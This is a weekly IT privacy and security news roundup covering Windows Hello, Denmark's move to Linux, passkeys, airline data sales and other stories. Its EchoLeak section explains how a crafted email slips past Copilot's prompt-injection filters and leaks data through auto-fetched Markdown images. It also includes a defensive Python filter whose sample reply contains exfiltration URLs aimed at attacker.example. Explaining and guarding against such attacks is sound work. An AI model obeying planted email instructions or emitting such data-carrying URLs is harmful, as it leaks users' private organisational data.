Broken Windows. The IT Privacy and Security Weekly Update for the Week Ending June 17th, 2025

EP 247.


In this update, Microsoft has updated Windows Hello to require both an infrared and a color camera for facial authentication. The change closes a spoofing vulnerability, but face unlock now needs visible light, which makes the biometric harder to fool and more of a nuisance for users in low-light settings. Consider exploring alternative operating systems like Linux for flexible authentication options.

Aim Labs identified and helped patch 'EchoLeak,' a zero-click vulnerability in Microsoft 365 Copilot that risked data exfiltration via malicious emails, highlighting the need for stonking great AI guardrails.

Denmark is shifting from Microsoft Office and Windows to LibreOffice and Linux to enhance digital sovereignty and reduce reliance on foreign technology, driven by security, economic, and geopolitical priorities.

Chinese AI companies are bypassing U.S. chip export controls by processing data in third countries like Malaysia, using suitcases of hard drives to transport AI-training data.

Mattel has teamed up with OpenAI to develop AI-enhanced toys, promising safe, engaging, and age-appropriate experiences, with the first product set to launch later this year.

Apple’s new passkey import/export feature, built on FIDO Alliance standards, enables secure credential transfers across platforms, boosting interoperability while maintaining biometric security.

This advances user convenience and cross-ecosystem flexibility. Now you can adopt passkeys to streamline secure authentication across your devices and platforms.

A data broker owned by major U.S. airlines sold passenger flight data to DHS, prompting privacy concerns as agencies track travel without disclosing data sources.

WhatsApp will begin displaying ads in its Updates section, using limited user data like location for targeting, while preserving end-to-end encryption for chats and messages.

INTERPOL’s Operation Secure dismantled over 20,000 malicious IPs linked to 69 malware variants, arresting 32 suspects and seizing significant data to curb phishing and fraud.

Let's get to the detail.

Global: Windows Hello Face Unlock No Longer Works in the Dark and Microsoft Says It's Not a Bug

https://www.windowscentral.com/software-apps/windows-11/windows-hello-face-unlock-no-longer-works-in-the-dark-and-microsoft-says-its-not-a-bug

Microsoft has disabled Windows Hello's ability to authenticate users in low-light environments: a recent security update now requires both an infrared sensor and a color camera to verify a face.
The system must see a visible face through the webcam before it completes the authentication with the IR sensor.
Windows Hello previously relied solely on infrared sensors to build its 3D facial scan, so the feature worked in complete darkness, much like the iPhone's Face ID.
Microsoft pushed the dual-camera requirement to close a spoofing vulnerability in the biometric system.

So what's the upshot for you?
No more working in the dark for Windows users. Broken Windows.
Could this present another opportunity to move to Linux? (tinkle of glass)

Global: Breaking down 'EchoLeak', the First Zero-Click AI Vulnerability Enabling Data Exfiltration from Microsoft 365 Copilot

https://www.aim.security/lp/aim-labs-echoleak-blogpost

Aim Labs has uncovered EchoLeak, a critical 'zero-click' vulnerability in Microsoft 365 Copilot that lets data be stolen automatically, just by receiving a malicious email, without any user interaction.
The flaw exploits what Aim Labs calls an 'LLM Scope Violation': an external attacker's prompt reaches into private organizational data that Copilot accesses via Microsoft Graph.
The attack uses a subtly crafted email to bypass Microsoft's prompt-injection filters: its instructions are phrased as if addressed to the human recipient rather than to the AI, so the filters do not flag them, yet Copilot still follows them once the email is pulled into context.
Copilot's response then embeds the retrieved data in Markdown image or link syntax; an image is fetched as soon as the response renders, so the data leaves the tenant without anyone clicking anything.
Researchers demonstrated that Copilot's integration lets it access emails, OneDrive, SharePoint, Teams chat logs, and more.
EchoLeak can exfiltrate this data silently using legitimate Microsoft services as proxies, dodging link-security safeguards.
This is the first weaponizable zero-click exploit in a widely used AI agent: no user behavior or interruption needed.
Microsoft has since patched the vulnerability (CVE-2025-32711), and Aim Labs worked with MSRC to disclose and fix it.
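As an added example (not Aim Labs' or Microsoft's code), here is a small output-side guardrail in Python for the exfiltration channel described above. It parses the Markdown image and link references in an assistant's reply, flags any whose URL could carry data out (a non-allowlisted host, an image URL with a query string, or a parameter that looks like an encoded blob or a nested URL), and strips them before the reply is rendered. The allowlist, the attacker host and the sample reply are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, urlparse

# Hosts this assistant may render links and images for.
# Assumption for this example: a tenant allowlist; replace with your own.
ALLOWED_HOSTS = {"contoso.sharepoint.com", "teams.microsoft.com"}

# Inline Markdown reference: optional '!' (image), then [text](url "optional title").
MD_REF = re.compile(r'(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?(?:\s+"[^"]*")?\s*\)')

# A parameter value that looks like an encoded blob rather than a normal value.
ENCODED_VALUE = re.compile(r"^[A-Za-z0-9+/=_-]{16,}$")


def assess_url(url: str, is_image: bool) -> list[str]:
    """Return the reasons a rendered URL could leak data (empty list if none)."""
    reasons = []
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if parsed.scheme not in ("http", "https"):
        reasons.append(f"scheme {parsed.scheme!r} is not http(s)")
    if host not in ALLOWED_HOSTS:
        reasons.append(f"host {host!r} is not allowlisted")
    params = parse_qsl(parsed.query, keep_blank_values=True)
    if is_image and params:
        # An image is fetched as soon as the reply renders, so any query
        # string is a zero-click channel, even through an allowlisted proxy.
        reasons.append("image URL carries a query string")
    for key, value in params:
        if "://" in value or ENCODED_VALUE.match(value):
            reasons.append(f"parameter {key!r} looks like a payload")
    return reasons


def scan(reply: str) -> list[dict]:
    """List every Markdown link/image in the reply together with its risk reasons."""
    findings = []
    for m in MD_REF.finditer(reply):
        is_image = m.group(1) == "!"
        findings.append({
            "image": is_image,
            "text": m.group(2),
            "url": m.group(3),
            "reasons": assess_url(m.group(3), is_image),
        })
    return findings


def sanitize(reply: str) -> str:
    """Rewrite risky references before the reply reaches the renderer.

    Risky images are dropped outright (rendering would fetch them); risky
    links are reduced to their visible text so a click cannot carry data.
    """
    def repl(m: re.Match) -> str:
        is_image = m.group(1) == "!"
        if not assess_url(m.group(3), is_image):
            return m.group(0)
        return "[image removed]" if is_image else m.group(2)
    return MD_REF.sub(repl, reply)


# Constructed sample reply: one benign internal link plus two exfiltration
# attempts, one of them routed through an allowlisted host acting as a fetch proxy.
SAMPLE_REPLY = (
    "Here is the summary you asked for.\n"
    "![status](https://contoso.sharepoint.com/sites/proxy/img.png"
    "?u=https://attacker.example/collect%3Fd%3DQTExLTIyMi1ERVBUX0JVREdFVA)\n"
    "See [the plan](https://contoso.sharepoint.com/sites/finance/Plan.docx).\n"
    "![logo](https://attacker.example/pixel.gif?secret=Q2xvdWQgYnVkZ2V0IDIwMjU)\n"
)

if __name__ == "__main__":
    for f in scan(SAMPLE_REPLY):
        print("IMAGE" if f["image"] else "LINK ", f["url"], f["reasons"] or "ok")
    print(sanitize(SAMPLE_REPLY))
```

Two design points follow directly from the research: an allowlist alone is not enough, because an allowlisted Microsoft service can be used as a proxy, so images are blocked whenever their URL carries any query string; and a link is downgraded rather than an image merely neutralized, because a link still needs a click while an image does not. The regex only covers inline references; reference-style links, raw HTML img tags and auto-links would need their own handling.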

So what's the upshot for you?
This research shines a light on a deeper issue: many AI agents that combine external inputs with internal data may be vulnerable unless guardrails specifically target these LLM Scope Violations.
And that is sometimes very hard to do.

DK: Denmark Is Dumping Microsoft Office and Windows For LibreOffice and Linux

https://www.zdnet.com/article/why-denmark-is-dumping-microsoft-office-and-windows-for-libreoffice-and-linux/

Denmark's Minister of Digitalization, Caroline Stage, has announced that the Danish government will start moving away from Microsoft Office to LibreOffice.
Why?
It's not because open-source is better, although I would argue that it is, but because Denmark wants to claim 'digital sovereignty.'
In the States, you probably haven't heard that phrase, but in the European Union, digital sovereignty is a big deal and getting bigger.
A combination of security, economic, political, and societal imperatives is driving the EU's digital sovereignty moves.
EU leaders are seeking to reduce Europe's dependence on foreign technology providers, primarily those from the United States, and to assert greater control over its digital infrastructure, data, and technological future.
Why?
Because they're concerned about who controls European data, who sets the rules, and who can potentially cut off access to essential services in times of geopolitical tension.
'Money issues have also played a decisive role,' writes ZDNet's Steven Vaughan-Nichols.
'Copenhagen's Microsoft software bill has soared from 313 million kroner in 2018 to 538 million kroner -- about $53 million in 2023, a 72% increase in just five years.'
David Heinemeier Hansson (DHH), a Dane, inventor of Ruby on Rails, and co-owner of the software developer company 37Signals, has said: 'Denmark is one of the most highly digitalized countries in the world.'
It's also one of the most Microsoft-dependent.
In fact, Microsoft is by far and away the single biggest dependency, so it makes perfect sense to start the quest for digital sovereignty there.

So what's the upshot for you?
Could this be in response to The US's protectionism?
No one is saying that outright, but depending on an OS and an office suite from a single company, in a country that can't decide from one week to the next whether it is going to slap tariffs on its trading partners, could provide an incentive.
The good news is that we have been using Linux and LibreOffice for years, and we think you too would be impressed!

CN: Chinese AI Companies Dodge US Chip Curbs Flying Suitcases of Hard Drives Abroad

https://www.tovima.com/wsj/chinese-ai-companies-dodge-u-s-chip-curbs-by-flying-suitcases-of-hard-drives-abroad/#:~:text=KUALA%20LUMPUR%2C%20Malaysia%E2%80%94In%20early,training%20an%20artificial-intelligence%20model.

Four Chinese AI engineers recently flew to Kuala Lumpur from Beijing, each carrying around 80 TB of AI-training data on hard drives—hand-cuffed onto four suitcases.
There, their firm rented ~300 Nvidia chip-powered servers, processed the data, then brought back trained model files—avoiding U.S. restrictions on exporting high-end chips into China.
U.S. export controls, tightened since 2022, have limited China's access to top-tier AI chips.
But Chinese firms have adapted—sometimes using domestic chips and other times rerouting models or hardware via third countries.
These suitcase-and-plane tactics rely on Malaysian and Middle Eastern data centers, where U.S. oversight is lighter.
Firms even set up local shell entities to skirt scrutiny.
In response, U.S. regulators floated 'country-caps' on chip exports to block backdoor access—then dropped them, opting instead to pressure companies like Nvidia to police end-uses.

So what's the upshot for you?
Sales of Samsonite suitcases are said to be skyrocketing in some provinces of China as the demand for clandestine AI training moves offshore.


Global: Barbie goes AI as Mattel teams with OpenAI to reinvent playtime with artificial intelligence

https://nerds.xyz/barbie-goes-ai-as-mattel-teams-with-openai-to-reinvent-playtime-with-artificial-intelligence/

Barbie is getting a brain upgrade.
Mattel has officially partnered with OpenAI in a move that brings artificial intelligence to the toy aisle.
Yes, you read that right, folks.
Barbie might soon be chatting with your kids in full sentences, powered by ChatGPT.
Mattel says the first product from this partnership will be revealed later this year.
No word yet on whether that product will be Barbie, Hot Wheels, or some AI-powered Magic 8-Ball that gives sarcastic answers.
This collaboration brings OpenAI's advanced tools into Mattel's ecosystem of toys and entertainment brands.
The goal?
To launch AI-powered experiences that are fun, safe, and age-appropriate.
Mattel says it wants to keep things magical while also respecting privacy and security.

So what's the upshot for you?
No word yet on whether it will be Barbie, Hot Wheels, or.... some AI-powered Magic 8-Ball that gives sarcastic answers.
Sorry.


Global: Apple Previews New Import/Export Feature To Make Passkeys More Interoperable

https://arstechnica.com/security/2025/06/apple-previews-new-import-export-feature-to-make-passkeys-more-interoperable/

Apple just previewed a new passkey import/export feature at WWDC, built on a FIDO Alliance standard, to bridge the gap between different platforms and password managers.
Until now, passkeys stored on an Apple device via iCloud were locked in, making it tricky to switch ecosystems.
The new system lets users initiate encrypted transfers directly between apps or operating systems.
It replaces risky CSV/JSON exports with Face ID-protected sharing, so no unencrypted files are left on disk.
It also works for other credentials like passwords and two-factor codes.
Built on a standardized data schema from FIDO, it's supported across iOS, macOS, iPadOS, and visionOS—and marks a big step toward true interoperability.
That means the passkeys you create can now follow you anywhere, not just within Apple's world.
Early reaction highlights both convenience and security wins—but some worry it compromises device-binding protections by making passkeys easier to move.
Apple insists transfers still demand local biometric or PIN authentication, keeping safety front and center.

So what's the upshot for you?
The lack of interoperability between passkey providers was a deterrent for those working across ecosystems.
This goes a long way towards instilling confidence that passkeys are a viable solution.


US: Airlines Don't Want You to Know They Sold Your Flight Data to DHS

https://www.404media.co/airlines-dont-want-you-to-know-they-sold-your-flight-data-to-dhs/

A data broker owned by the country's major airlines, including Delta, American Airlines, and United, collected U.S. travellers' domestic flight records, sold access to them to Customs and Border Protection (CBP), and then as part of the contract told CBP to not reveal where the data came from.
The data includes passenger names, their full flight itineraries, and financial details.
CBP, a part of the Department of Homeland Security (DHS), says it needs this data to support state and local police in tracking the air travel of people of interest across the country, a purchase that has alarmed civil liberties experts.
The documents reveal for the first time in detail why at least one part of DHS purchased such information, and come after Immigration and Customs Enforcement (ICE) detailed its own purchase of the data.
The documents also show for the first time that the data broker, called the Airlines Reporting Corporation (ARC), tells government agencies not to mention where it sourced the flight data from.
'The big airlines -- through a shady data broker that they own called ARC -- are selling the government bulk access to Americans' sensitive information, revealing where they fly and the credit card they used,' Senator Ron Wyden said in a statement.
ARC is owned and operated by at least eight major U.S. airlines, other publicly released documents show.
The company's board of directors include: representatives from Delta, Southwest, United, American Airlines, Alaska Airlines, JetBlue, and European airlines Lufthansa and Air France, and Canada's Air Canada.
More than 240 airlines depend on ARC for ticket settlement services.

So what's the upshot for you?
Another significant privacy infraction revealed.
Things are beginning to feel very wrong 'In the land of the free and the home of the brave.'

Global: WhatsApp Introduces Ads in Its App

https://www.nytimes.com/2025/06/16/technology/whatsapp-ads.html

When Facebook bought WhatsApp for $19 billion in 2014, the messaging app had a clear focus.
No ads, no games and no gimmicks.
For years, that is what WhatsApp's two billion users -- many of them in Brazil, India and other countries around the world -- got.
They chatted with friends and family unencumbered by advertising and other features found on social media.
Now that is set to change.
On Monday, WhatsApp said it would start showing ads inside its app for the first time.
The promotions will appear only in an area of the app called Updates, which is used by around 1.5 billion people a day.
WhatsApp will collect some data on users to target the ads, such as location and the device's default language, but it will not touch the contents of messages or whom users speak with.
The company added that it had no plans to place ads in chats and personal messages.

So what's the upshot for you?
In-app ads are a significant change from WhatsApp's original philosophy.
Jan Koum and Brian Acton, who founded WhatsApp in 2009, were committed to building a simple and quick way for friends and family to communicate with end-to-end encryption, a method of keeping texts, photos, videos and phone calls inaccessible to third parties.
Both left the company seven years ago.
Since then, Mark Zuckerberg, the chief executive of Facebook, now Meta, has focused on WhatsApp's growth and user privacy while also melding the app into the company's other products, including Instagram and Messenger.

EU: INTERPOL Dismantles 20,000+ Malicious IPs Linked to 69 Malware Variants in Operation Secure

https://thehackernews.com/2025/06/interpol-dismantles-20000-malicious-ips.html

INTERPOL led a global operation, 'Operation Secure,' from January to April 2025.
Together with 26 countries, they dismantled over 20,000 malicious IPs and domains tied to 69 info-stealing malware strains.
The operation shut down 79% of targeted hosts, seized 41 servers and 100 GB of stolen data, and arrested 32 suspects.
Notably, 18 arrests occurred in Vietnam, 12 in Sri Lanka, and 2 in Nauru.
Hong Kong police uncovered 117 command-and-control servers across 89 ISPs.
These were used to coordinate phishing, fraud, and social-media scams.
Firms like Group-IB, Trend Micro, and Kaspersky shared malware intel.
They helped trace infostealer families such as Lumma, Vidar, and Rhadamanthys, which harvest sensitive credentials and facilitate later attacks.

So what's the upshot for you?
Information-stealers often serve as entry tools for larger hacks—ransomware, business email compromise, financial fraud, so this is a win for us all.


That was an update-packed week we shared with you. We covered:


The updated Windows Hello Face Unlock now requires both infrared and color cameras, prioritizing security but limiting low-light functionality.
It might be time to explore alternative OSes and authentication solutions to balance convenience and protection.

The patched 'EchoLeak' vulnerability in Microsoft 365 Copilot highlights the need for much better AI security to prevent data exfiltration. A huge part of AI security will be keeping AI tools patched and monitoring them for vulnerabilities so that data stays protected.

Denmark’s transition to LibreOffice and Linux emphasizes digital sovereignty and cost savings through open-source adoption.  Consider open-source alternatives to enhance control over your digital infrastructure.

Chinese AI firms bypass U.S. chip curbs by processing data abroad, showcasing adaptability under regulatory constraints.  It might be time to invest in suitcase shares.

Mattel’s partnership with OpenAI for AI-powered toys promises engaging play but requires strong privacy safeguards. Probably best to buy your kids' next AI toy on the zero-trust model. So far, toy manufacturers have only been good at collecting as much data on your kid as possible, and then losing it.

Apple’s new passkey import/export feature enhances cross-platform security and user convenience. We'll believe it when we see it, but this is the passkey nirvana we have been waiting for.

Airlines’ sale of flight data to DHS via a data broker raises significant privacy concerns for travelers. Cars, planes and trains. OK, we have not caught the railroads doing this yet, but stay tuned!

WhatsApp’s introduction of targeted ads in its Updates section shifts the user experience while preserving message privacy. We suggested you go Signal or Session years ago, so don't complain if silly ads start turning up in your WhatsApp feeds.

INTERPOL’s Operation Secure dismantled malware networks, strengthening global cybersecurity against phishing and fraud. It's a small win, but it won't last long. The baddies will be back, so keep sharp and keep reading the update and listening to the podcasts!

And our quote of the week: "Discipline is the bridge between goals and accomplishment" - J. Rohn
That's it for this week, stay safe, stay secure, leave a comment on the podcast, share it with a friend, and we'll see you in se7en!

